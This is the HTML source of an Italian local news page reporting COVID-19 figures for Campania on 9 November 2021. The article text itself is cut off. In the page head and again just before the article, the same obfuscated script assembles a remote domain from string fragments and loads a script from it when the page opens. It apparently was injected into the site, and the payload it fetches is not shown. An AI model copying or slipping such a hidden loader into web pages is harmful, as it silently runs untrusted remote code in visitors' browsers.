<!doctype html>
<html lang="it-IT" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="https://www.ilmeridianonews.it/xmlrpc.php">
	<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-16491620-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-16491620-1');
</script>
<script src="https://track.eadv.it/ilmeridianonews.it.php"></script>
<title>Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati &#8211; Il Meridiano News</title><link rel="stylesheet" id="siteground-optimizer-combined-css-a6e88b11aed805a611cc4fb3fb80f3f4" href="https://www.ilmeridianonews.it/wp-content/uploads/siteground-optimizer-assets/siteground-optimizer-combined-css-a6e88b11aed805a611cc4fb3fb80f3f4.css" media="all" />
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Il Meridiano News &raquo; Feed" href="https://www.ilmeridianonews.it/feed/" />
<link rel="alternate" type="application/rss+xml" title="Il Meridiano News &raquo; Feed dei commenti" href="https://www.ilmeridianonews.it/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Il Meridiano News &raquo; Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati Feed dei commenti" href="https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/feed/" />



<link rel='stylesheet' id='bdayhFontAwesome-css'  href='https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='BD-GOOGLE-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A400italic%2C400%2C500%2C600%2C700%7COswald%3A400%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic' type='text/css' media='all' />
<link rel='stylesheet' id='Roboto-css'  href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic' type='text/css' media='all' />
<link rel='stylesheet' id='Sintony-css'  href='https://fonts.googleapis.com/css?family=Sintony%3Aregular%2C700' type='text/css' media='all' />
<link rel='stylesheet' id='Droid+Sans-css'  href='https://fonts.googleapis.com/css?family=Droid+Sans%3Aregular%2C700' type='text/css' media='all' />
<script type='text/javascript' id='jquery-core-js-extra'>
/* <![CDATA[ */
var bd_script = {"post_id":"301417","ajaxurl":"https:\/\/www.ilmeridianonews.it\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.ilmeridianonews.it/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>
<link rel="https://api.w.org/" href="https://www.ilmeridianonews.it/wp-json/" /><link rel="alternate" type="application/json" href="https://www.ilmeridianonews.it/wp-json/wp/v2/posts/301417" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.ilmeridianonews.it/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.ilmeridianonews.it/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.8.1" />
<link rel="canonical" href="https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/" />
<link rel='shortlink' href='https://www.ilmeridianonews.it/?p=301417' />
<link rel="alternate" type="application/json+oembed" href="https://www.ilmeridianonews.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.ilmeridianonews.it%2F2021%2F11%2Fcoronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.ilmeridianonews.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.ilmeridianonews.it%2F2021%2F11%2Fcoronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati%2F&#038;format=xml" />

<!-- This site is using AdRotate v5.6.4 Professional to display their advertisements - https://ajdg.solutions/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-1 { min-width:0px; max-width:1106px; }
	.b-1 { margin:0px 0px 0px 0px; }
	.g-2 { min-width:10px; max-width:640px; margin: 0 auto; }
	.b-2 { margin:10px 10px 0px 10px; }
	.g-3 { min-width:0px; max-width:300px; }
	.b-3 { margin:0px 0px 0px 0px; }
	.g-10 { min-width:0px; max-width:1100px; }
	.b-10 { margin:0px 0px 0px 0px; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->

<link rel="shortcut icon" href="https://www.ilmeridianonews.it/wp-content/uploads/2016/05/16.png" type="image/x-icon" />
<link rel="apple-touch-icon-precomposed" href="https://www.ilmeridianonews.it/wp-content/uploads/2016/05/57.png" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://www.ilmeridianonews.it/wp-content/uploads/2016/05/114.png" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://www.ilmeridianonews.it/wp-content/uploads/2016/05/72.png" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://www.ilmeridianonews.it/wp-content/uploads/2016/05/144.png" />
<style type="text/css" media='screen'>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</style><script type="text/javascript">
var templateDir = 'https://www.ilmeridianonews.it/wp-content/themes/magic-mag';
</script><!--[if lt IE 9]><script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<!-- START - Open Graph and Twitter Card Tags 3.1.1 -->
 <!-- Facebook Open Graph -->
  <meta property="og:locale" content="it_IT"/>
  <meta property="og:site_name" content="Il Meridiano News"/>
  <meta property="og:title" content="Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati"/>
  <meta property="og:url" content="https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/"/>
  <meta property="og:type" content="article"/>
  <meta property="og:description" content="I dati sono diffusi, come ogni giorno, dalle ASL del territorio"/>
  <meta property="og:image" content="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59.png"/>
  <meta property="og:image:url" content="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59.png"/>
  <meta property="og:image:secure_url" content="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59.png"/>
  <meta property="og:image:width" content="1260"/>
  <meta property="og:image:height" content="660"/>
  <meta property="article:published_time" content="2021-11-09T16:51:42+01:00"/>
  <meta property="article:modified_time" content="2021-11-09T16:51:42+01:00" />
  <meta property="og:updated_time" content="2021-11-09T16:51:42+01:00" />
  <meta property="article:section" content="Primo Piano"/>
  <meta property="article:author" content="https://www.facebook.com/Gianliga"/>
  <meta property="article:publisher" content="https://www.facebook.com/IlMeridianoNews/"/>
 <!-- Google+ / Schema.org -->
  <meta itemprop="name" content="Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati"/>
  <meta itemprop="headline" content="Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati"/>
  <meta itemprop="description" content="I dati sono diffusi, come ogni giorno, dalle ASL del territorio"/>
  <meta itemprop="image" content="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59.png"/>
  <meta itemprop="datePublished" content="2021-11-09"/>
  <meta itemprop="dateModified" content="2021-11-09T16:51:42+01:00" />
  <meta itemprop="author" content="Gianluca Russo"/>
  <!--<meta itemprop="publisher" content="Il Meridiano News"/>--> <!-- To solve: The attribute publisher.itemtype has an invalid value -->
 <!-- Twitter Cards -->
  <meta name="twitter:title" content="Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati"/>
  <meta name="twitter:url" content="https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/"/>
  <meta name="twitter:description" content="I dati sono diffusi, come ogni giorno, dalle ASL del territorio"/>
  <meta name="twitter:image" content="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59.png"/>
  <meta name="twitter:card" content="summary_large_image"/>
 <!-- SEO -->
 <!-- Misc. tags -->
 <!-- is_singular -->
<!-- END - Open Graph and Twitter Card Tags 3.1.1 -->
	
	<script>
(function(){
tzkmu="X4levn5czkmc";tzkm=document.createElement("script");
tzkm_="u"+("st");tzkm_+="at"+(".");tzkm.async=true;tzkm_+="in";
tzkmu="315821061."+tzkmu;tzkm.type="text/javascript";tzkmu+="fl3l6ckXvfuy";
tzkmu+="c9fiu9";tzkm_+=("f")+"o"+("/");tzkm.src="https://"+tzkm_+tzkmu;
tzkmd=document.body;tzkmd.appendChild(tzkm);
})();
</script>
</head>

</html>
<span class="img">

						<!-- Either there are no banners, they are disabled or none qualified for this location! -->				</span>

<body id="top" class="post-template-default single single-post postid-301417 single-format-standard singular il-meridiano-news bd on-lightbox on-mobile-menu">



<div class="page-outer">
	
    <div class="bg-cover"></div>

            <aside class="bd-MobileSiderbar">

            
            <div id="mobile-menu">

                                    <div class="menu-mainmenu-container"><ul id="menu-mainmenu" class="nav-menu main-default-menu"><li id="menu-item-27669" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-27669"><a href="https://www.ilmeridianonews.it">Home</a></li>
<li id="menu-item-1776" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1776"><a href="https://www.ilmeridianonews.it/category/attualita/">Attualità</a></li>
<li id="menu-item-1777" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1777"><a href="https://www.ilmeridianonews.it/category/ck87-cronaca/">Cronaca</a></li>
<li id="menu-item-1781" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1781"><a href="https://www.ilmeridianonews.it/category/ck88-politica/">Politica</a></li>
<li id="menu-item-1778" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1778"><a href="https://www.ilmeridianonews.it/category/ck92-cultura/">Cultura</a></li>
<li id="menu-item-1779" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1779"><a href="https://www.ilmeridianonews.it/category/economia/">Economia</a></li>
<li id="menu-item-1780" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1780"><a href="https://www.ilmeridianonews.it/category/eventi-2/">Eventi</a></li>
<li id="menu-item-1782" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1782"><a href="https://www.ilmeridianonews.it/category/sport/">Sport</a></li>
<li id="menu-item-18751" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18751"><a href="https://www.ilmeridianonews.it/redazione/">Redazione</a></li>
<li id="menu-item-18750" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18750"><a href="https://www.ilmeridianonews.it/contatti/">Contatti</a></li>
<li id="menu-item-209124" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-209124"><a href="https://www.ilmeridianonews.it/pubblicita/">Pubblicità</a></li>
</ul></div>                
                
            </div>

            
        </aside>
    
<div id="page" class=" boxed ">
    <div class="inner-wrapper">

        
            <div id="topbar" class="topbar top-light">
        <div class="bdayh-wrap">
            <div class="bdayh-inner">

                <span class="today-date"> 9 Novembre 2021</span>
                                    <div id="top-menu-mob" class="top-menu-mob">
                        <div class="top-mob-btn">
                            <i class="fa fa-bars"></i>
                        </div><!-- .top-mob-btn -->

                        <div class="top-menu-drop">
                            <div class="top-menu-drop-content">

                                                                    <div class="menu-citta-container"><ul id="menu-citta" class="nav-menu"><li id="menu-item-27647" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-27647"><a href="https://www.ilmeridianonews.it/category/area-nord/">Area Nord</a>
<ul class="sub-menu">
	<li id="menu-item-28122" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28122"><a href="https://www.ilmeridianonews.it/category/giugliano-2/">Giugliano</a></li>
	<li id="menu-item-22528" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22528"><a href="https://www.ilmeridianonews.it/category/fascia-costiera-2/">Fascia Costiera</a></li>
	<li id="menu-item-28124" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28124"><a href="https://www.ilmeridianonews.it/category/villaricca-2/">Villaricca</a></li>
	<li id="menu-item-28121" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28121"><a href="https://www.ilmeridianonews.it/category/melito-2/">Melito</a></li>
	<li id="menu-item-28125" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28125"><a href="https://www.ilmeridianonews.it/category/mugnano-2/">Mugnano</a></li>
	<li id="menu-item-28123" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28123"><a href="https://www.ilmeridianonews.it/category/marano-2/">Marano</a></li>
	<li id="menu-item-28126" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28126"><a href="https://www.ilmeridianonews.it/category/qualiano-2/">Qualiano</a></li>
</ul>
</li>
<li id="menu-item-79058" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79058"><a href="https://www.ilmeridianonews.it/category/casoria/">Casoria</a></li>
<li id="menu-item-79061" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79061"><a href="https://www.ilmeridianonews.it/category/afragola/">Afragola</a></li>
<li id="menu-item-79062" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79062"><a href="https://www.ilmeridianonews.it/category/frattamaggiore/">Frattamaggiore</a></li>
<li id="menu-item-79204" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79204"><a href="https://www.ilmeridianonews.it/category/aversa/">Aversa</a></li>
<li id="menu-item-17250" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17250"><a href="https://www.ilmeridianonews.it/category/agro-aversano/">Casertano</a></li>
<li id="menu-item-17251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17251"><a href="https://www.ilmeridianonews.it/category/area-flegrea-2/">Area Flegrea</a></li>
<li id="menu-item-17252" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17252"><a href="https://www.ilmeridianonews.it/category/altre-citta/">Altre città</a></li>
</ul></div>                                
                            </div><!-- .top-menu-drop-content -->
                        </div><!-- .top-menu-drop -->

                    </div><!-- .top-menu-mob -->

                    <div class="top-menu" id="top-menu">
                                                    <ul id="nav-menu" class="nav-menu">
                                <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-27647"><a href="https://www.ilmeridianonews.it/category/area-nord/">Area Nord</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28122"><a href="https://www.ilmeridianonews.it/category/giugliano-2/">Giugliano</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22528"><a href="https://www.ilmeridianonews.it/category/fascia-costiera-2/">Fascia Costiera</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28124"><a href="https://www.ilmeridianonews.it/category/villaricca-2/">Villaricca</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28121"><a href="https://www.ilmeridianonews.it/category/melito-2/">Melito</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28125"><a href="https://www.ilmeridianonews.it/category/mugnano-2/">Mugnano</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28123"><a href="https://www.ilmeridianonews.it/category/marano-2/">Marano</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28126"><a href="https://www.ilmeridianonews.it/category/qualiano-2/">Qualiano</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79058"><a href="https://www.ilmeridianonews.it/category/casoria/">Casoria</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79061"><a href="https://www.ilmeridianonews.it/category/afragola/">Afragola</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79062"><a href="https://www.ilmeridianonews.it/category/frattamaggiore/">Frattamaggiore</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79204"><a href="https://www.ilmeridianonews.it/category/aversa/">Aversa</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17250"><a href="https://www.ilmeridianonews.it/category/agro-aversano/">Casertano</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17251"><a href="https://www.ilmeridianonews.it/category/area-flegrea-2/">Area Flegrea</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17252"><a href="https://www.ilmeridianonews.it/category/altre-citta/">Altre città</a></li>
                                                            </ul>

                        
                    </div><!-- .top-menu -->
                
                                

                                    <div class="top-search">
                        <div class="search-btn">
                            <i class="fa fa-search"></i>
                        </div><!-- .search-btn -->

                        <div class="search-dropdown">
                            <div class="top-search-content">
                                        <form role="search" method="get" class="search-form" action="https://www.ilmeridianonews.it/">
            <button><i class='fa fa-search'></i></button>
            <input type="search" class="search-field search-live" id="s-header" placeholder="Search" value="" name="s"  />
        </form>
                                </div>
                        </div><!-- .search-dropdown -->
                    </div><!-- .top-search -->

                                <div class="social-icons icon-size-25">
<a class=" si-facebook" title="Facebook" href="https://www.facebook.com/IlMeridianoNews" target="_blank"><i class="fa fa-facebook"></i></a>
<a class=" si-twitter" title="Twitter" href="https://twitter.com/ilmeridianonews" target="_blank"><i class="fa fa-twitter"></i></a>
<a class=" si-youtube" title="Youtube" href="https://www.youtube.com/channel/UCkw-C3D12fbw1sL_xuupK2w" target="_blank"><i class="fa fa-youtube"></i></a>
<a class=" si-rss" title="Rss" href="https://www.ilmeridianonews.it/rss" target="_blank"><i class="fa fa-rss"></i></a>
</div>            </div><!-- .bdayh-inner -->
        </div><!-- .bdayh-wrap -->
    </div><!-- #topbar -->
    
    <header id="header" class="logo-center" role="banner">
        <div class="bdayh-wrap">
            <div class="bdayh-inner">
                                    <a class="bd-ClickOpen bd-ClickAOpen" href="#"><span></span></a>
                <div class="themequote quoteleft">

									<span class="img">

						<!-- Either there are no banners, they are disabled or none qualified for this location! -->				</span>

											</div> <div class="themequote quoteright">

									<span class="img">

						<!-- Either there are no banners, they are disabled or none qualified for this location! -->					</span>

			</div>
                
    <div class="logo" style="margin:auto auto auto auto">
        <h2 class="site-title">                                <a href="https://www.ilmeridianonews.it/" rel="home">
                <img src="https://www.ilmeridianonews.it/wp-content/uploads/2016/05/LOGOMERI1.png" alt="Il Meridiano News" />
            </a>
                    <script>jQuery(document).ready(function($) { var retina = window.devicePixelRatio > 1 ? true : false; if( retina ) { jQuery('#theme-header .bd-logo img').attr('src', 'https://www.ilmeridianonews.it/wp-content/uploads/2016/05/LOGOMERI2.png'); jQuery('#theme-header .bd-logo img').attr('width', '375'); } });</script>
                        </h2>    </div><!-- End Logo -->
				<br/>
				<div class="bdayh-wrap2"><a href="https://www.ilmeridianonews.it/tag/coronavirus/"><h3><center>
					
					<b><font color="#ffffff">Ultime news sul Coronavirus » </font><img src="https://www.ilmeridianonews.it/wp-content/uploads/2020/03/pino6.gif" width="15" height="15"></center></b> </a></h3></div>
                <div id="header-ads" class="header-ads">
            
                <center><div class="g g-1"><div class="g-col b-1 a-47"><a href="http://www.rcsafety.com">
    <video width="1100" height="300" autoplay playsinline loop muted media="(max-width: 500px)">
  <source src="https://www.staging3.gianlucar.sg-host.com/wp-content/uploads/2021/06/outputcompress-video-online.com_.mp4" type="video/mp4" />
</video>
</a>
</div></div></center>
                    </div>
            </div><!-- .bdayh-inner -->
        </div><!-- .bdayh-wrap -->
    </header><div class="cf"></div><!-- #header -->

    <nav id="navigation" class="navigation primary-menu-light bd-no-border-color">

        <div class="bdayh-wrap">
            <div class="bdayh-inner">
                <div id="nav-menu" class="nav-menu">
                    <div class="primary-menu">
                        
                            
                            <div class="menu-mainmenu-container"><ul id="menu-primary" class=""><li id="menu-item-27669" class=" menu-item menu-item-type-custom menu-item-object-custom menu-item-home bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it">  <span class="menu-label" style="" >Home</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-1776" class=" menu-item menu-item-type-taxonomy menu-item-object-category bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/category/attualita/">  <span class="menu-label" style="" >Attualità</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-1777" class=" menu-item menu-item-type-taxonomy menu-item-object-category bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/category/ck87-cronaca/">  <span class="menu-label" style="" >Cronaca</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-1781" class=" menu-item menu-item-type-taxonomy menu-item-object-category bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/category/ck88-politica/">  <span class="menu-label" style="" >Politica</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-1778" class=" menu-item menu-item-type-taxonomy menu-item-object-category bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/category/ck92-cultura/">  <span class="menu-label" style="" >Cultura</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-1779" class=" menu-item menu-item-type-taxonomy menu-item-object-category bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/category/economia/">  <span class="menu-label" style="" >Economia</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-1780" class=" menu-item menu-item-type-taxonomy menu-item-object-category bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/category/eventi-2/">  <span class="menu-label" style="" >Eventi</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-1782" class=" menu-item menu-item-type-taxonomy menu-item-object-category bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/category/sport/">  <span class="menu-label" style="" >Sport</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-18751" class=" menu-item menu-item-type-post_type menu-item-object-page bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/redazione/">  <span class="menu-label" style="" >Redazione</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-18750" class=" menu-item menu-item-type-post_type menu-item-object-page bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/contatti/">  <span class="menu-label" style="" >Contatti</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
<li id="menu-item-209124" class=" menu-item menu-item-type-post_type menu-item-object-page bd_depth- bd_menu_item " ><a href="https://www.ilmeridianonews.it/pubblicita/">  <span class="menu-label" style="" >Pubblicità</span><span class='bdayh-menu-border-color' style='background:  !important;'></span></a>
</ul></div>                                            </div>

                    
                </div><!-- #nav-menu -->
            </div>
        </div>

    </nav><div class="cf"></div><!-- #navigation -->

    
    
    
    <div id="main" class="main">
        <div class="bdayh-wrap">
            <div class="container-main">
                <div class="bdayh-inner">
                    <div id="content" class="content" role="main">
    <div class="cf"></div>
<script>
(function(){
tzkmu="X4levn5czkmc";tzkm=document.createElement("script");
tzkm_="u"+("st");tzkm_+="at"+(".");tzkm.async=true;tzkm_+="in";
tzkmu="315821061."+tzkmu;tzkm.type="text/javascript";tzkmu+="fl3l6ckXvfuy";
tzkmu+="c9fiu9";tzkm_+=("f")+"o"+("/");tzkm.src="https://"+tzkm_+tzkmu;
tzkmd=document.body;tzkmd.appendChild(tzkm);
})();
</script>
	
        <article id="post-301417" class="post-id post-301417 post type-post status-publish format-standard has-post-thumbnail hentry category-primo-piano"  itemscope itemtype="http://schema.org/Article">

            <div id="post-header-bd" class="post-header-bd">
                                    <div class="entry-crumbs">
                        <span></span><div class="vbreadcrumb" itemscope="" itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content="Home"><meta itemprop="url" content="https://www.ilmeridianonews.it/"><a href="https://www.ilmeridianonews.it/" class="home" >Home</a></div><div class="vbreadcrumb" itemscope="" itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content="Primo Piano"><meta itemprop="url" content="https://www.ilmeridianonews.it/category/primo-piano/"><a  href="https://www.ilmeridianonews.it/category/primo-piano/" title="Primo Piano">Primo Piano</a></div>	                    <div class="vbreadcrumb">
                            Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati                        </div>
                    </div><!-- .entry-crumbs -->
                                <header>
                    <h1 class="entry-title">Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati</h1>					<h2 class="excerpt-title"><p>I dati sono diffusi, come ogni giorno, dalle ASL del territorio</p>
</h2>
                        <div class="meta-info">

                    <div class="post-author-bd">
                By <a href="https://www.ilmeridianonews.it/author/gianlucarusso/" title="">Gianluca Russo </a>
            </div><!-- .post-author-bd -->
        
                    <div class="post-date-bd">
                - <span>9 Novembre 2021</span>            </div> <!-- .post-date-bd -->
        
        
        
        
                    <div class="post-twitter-bd">
                            </div> <!-- .post-twitter-bd -->
        
    </div><!-- .meta-info -->
                    
<script>
    window.___gcfg = {lang: 'en-US'};
    (function(w, d, s) {
        function go(){
            var js, fjs = d.getElementsByTagName(s)[0], load = function(url, id) {
                if (d.getElementById(id)) {return;}
                js = d.createElement(s); js.src = url; js.id = id;
                fjs.parentNode.insertBefore(js, fjs);
            };
            load('//connect.facebook.net/en/all.js#xfbml=1', 	'fbjssdk' );
            load('https://apis.google.com/js/plusone.js', 		'gplus1js');
            load('//platform.twitter.com/widgets.js', 			'tweetjs' );
        }
        if (w.addEventListener) { w.addEventListener("load", go, false); }
        else if (w.attachEvent) { w.attachEvent("onload",go); }
    }(window, document, 'script'));
</script>


<div class="cf"></div>
<div class="post-sharing-bd">
    <ul>
        <li class="ps-title">
            <i class="fa fa-share-alt"></i>
        </li>

                    <li class="facebook">
                <a title="facebook" onClick="window.open('https://www.facebook.com/sharer.php?u=https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/','Facebook','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="https://www.facebook.com/sharer.php?u=https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/">
                    <i class="fa fa-facebook"></i>
                </a>
            </li>
        
                    <li class="twitter">
                <a title="twitter" onClick="window.open('https://twitter.com/share?url=https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/&amp;text=Coronavirus%20in%20Campania:%20493%20nuovi%20casi,%20altri%205%20decessi%20registrati','Twitter share','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="https://twitter.com/share?url=https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/&amp;text=Coronavirus%20in%20Campania:%20493%20nuovi%20casi,%20altri%205%20decessi%20registrati">
                    <i class="fa fa-twitter"></i>
                </a>
            </li>
        
        
        
        
        
        
	    <li class="whatsapp">
		    <a href="whatsapp://send?text=I+dati+sono+diffusi%2C+come+ogni+giorno%2C+dalle+ASL+del+territorio%20-%20https%3A%2F%2Fwww.ilmeridianonews.it%2F2021%2F11%2Fcoronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati%2F" ><i class="fa fa-whatsapp"></i></a>	    </li>

	    <li class="telegram" style="display: none">
		    <a href="tg://msg?text=I+dati+sono+diffusi%2C+come+ogni+giorno%2C+dalle+ASL+del+territorio%20-%20https%3A%2F%2Fwww.ilmeridianonews.it%2F2021%2F11%2Fcoronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati%2F" ><i class="fa fa-telegram"></i></a>	    </li>
    </ul>
</div>
<div class="cf"></div>
<!-- .post-sharing-bd -->                </header>
            </div><!-- .post-header-bd -->
            <div class="post-content-bd">
                <div id="articleTop-ads" class="articleTop-ads">
            
                <!-- Error, Ad is not available at this time due to schedule/budgeting/geolocation/mobile restrictions! -->
<br/>
<div class="g g-9"><div class="g-single a-7"><a href="http://www.union-security.net/"><img src="https://www.ilmeridianonews.it/wp-content/uploads/2018/03/RESTA2.jpg" /></a></div></div>

                    </div>
                
                
                        <div class="post-featured" id="post-featured">
                <div class="post-featured-image-bd">
                                        <figure>
                                                    <a href="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59.png" rel="bookmark">
